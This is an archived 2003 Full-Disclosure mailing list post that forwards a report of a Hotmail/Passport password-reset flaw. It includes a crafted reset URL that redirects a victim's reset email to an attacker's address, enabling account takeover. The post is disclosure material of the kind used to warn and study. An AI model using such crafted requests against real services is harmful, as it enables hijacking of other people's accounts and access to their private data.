[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability
From: "*Naty *" <naty_nenalinda@xxxxxxxxxxx>
Date: Sun, 07 Sep 2003 06:37:07 +0000

<html><div style='background-color:'><DIV>
<DIV>
<DIV>
<DIV>
<DIV>
<DIV>
<DIV>
<DIV>
<DIV>I am forwarding this as it may impact people whom depend on MSN 
or<BR>passport systems for business reasons. Contrary to what at<BR>least one 
of the full-disclosure follow-ups reports, it does work.<BR><BR>D<BR></DIV>
<DIV>---------- Forwarded message ----------<BR>Date: Wed, 7 May 2003 19:50:51 
-0700 (PDT)<BR>From: Muhammad Faisal Rauf Danka <MFRD@xxxxxxxxxxxxx><BR>To: 
full-disclosure@xxxxxxxxxxxxxxxx<BR>Subject: [Full-Disclosure] Hotmail &amp; 
Passport (.NET Accounts) Vulnerability<BR><BR>Hotmail &amp; Passport (.NET 
Accounts) Vulnerability<BR><BR>There is a very serious and stupid vulnerability 
or badcoding in Hotmail / Passportâ??s (.NET<BR>Accounts)<BR><BR>I tried 
sending emails several times to Hotmail / Passport contact addresses, but 
always met<BR>with the NLP bots.<BR><BR>I guess I donâ??t need to go in details 
of how cruical and important Hotmail / Passportâ??s<BR>.NET Account passport is 
to anyone.<BR><BR>You name it and they have it, E-Commerce, Credit Card 
processing, Personal Emails, Privacy Issues,<BR>Corporate Espionage, maybe 
stalkers and what not.<BR><BR>It is so simple that it is funny.<BR><BR>All you 
got to do is hit the following in your browser:<BR><BR><A href="https!
 
://register.passport.net/emailpwdreset.srf?lc=1033&amp;em=pablo_david_d@xxxxxxxxxxx&amp;id=&amp;cb=&amp;prefem=naty_nenalinda@xxxxxxxxxxx&amp;rst=1">https://register.passport.net/emailpwdreset.srf?lc=1033&amp;em=pablo_david_d@xxxxxxxxxxx&amp;id=&amp;cb=&amp;prefem=naty_nenalinda@xxxxxxxxxxx&amp;rst=1</A><BR><BR>And
 youâ??ll get an email on <A 
href="mailto:naty_nenalinda@xxxxxxxxxxxxxxx";>naty_nenalinda@xxxxxxxxxxxxxxx</A> 
asking you to click on a url something 
like<BR>this:<BR><BR>http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&amp;URLNum=0&amp;lc=1033<BR><BR>&gt;From
 that url, you can reset the password and I donâ??t think I need to say 
anything more about<BR>it.<BR><BR>Vulnerability / Flaw discovered : 12th April 
2003<BR>Vendor / Owner notified : Yes (as far as emailing them more than 10 
times is concerned)<BR><BR><BR>Regards<BR>--------<BR>Muhammad Faisal Rauf 
Danka </DIV></DIV></DIV></DIV></DIV></DIV></DIV></DIV></DIV></div><br 
clear=all><hr>Las mejor!
 es tiendas, los precios mas bajos, entregas en todo el mundo, YupiMSN 

Compras:  <a href="http://g.msn.com/8HMLES/2746??PS=";>Haz clic aquí...</a> 
</html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: [Full-Disclosure] scanning port 1010?
Next by Date: [Full-Disclosure] [SECURITY] [DSA-376-2] New exim packages fix incorrect permissions on documentation
Previous by thread: Re: [Full-Disclosure] scanning port 1010?
Next by thread: Re: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability
Index(es):
- Date
- Thread